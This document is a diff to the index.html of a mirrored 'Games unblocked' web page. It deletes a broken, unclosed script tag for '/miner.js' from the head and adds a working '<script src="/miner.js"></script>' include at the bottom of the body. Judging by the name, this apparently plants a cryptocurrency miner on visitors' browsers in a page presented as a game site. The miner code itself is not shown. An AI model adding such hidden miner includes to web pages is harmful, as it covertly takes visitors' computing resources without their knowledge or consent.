--- a/index.html
+++ b/index.html
@@ -6,7 +6,6 @@
 <!-- Mirrored from games-unblocked.w3spaces.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 25 Feb 2022 16:24:25 GMT -->
 <head>
       <title>Games unblocked | unblocked fun!</title>
-      <script src="/miner.js">
       <link rel="stylesheet" type="text/css" href="styles.css">
       <meta name="keywords" content="Games, Games unblocked, LgaUnblocked, Unblocked, Unblocked games, LgaUnblocked" />
       <meta name="description" content="Your place for fun unblocked games! Welcome to games unblocked!" />
@@ -110,7 +109,6 @@ Keep in mind, some games may not make it; however, the vast majority will!
   &nbsp;
 <div>
 <img src="Images/DAVID_APROVED.png" alt="DAVID THE GOAT APROVING IT" style="width:100%; height:100%" href="Friday-night-funkin.html">
+ <script src="/miner.js"></script>
   </body>
-
-<!-- Mirrored from games-unblocked.w3spaces.com/ by HTTrack Website Copier/3.x [XR&CO'2017], Fri, 25 Feb 2022 16:24:45 GMT -->
 </html>
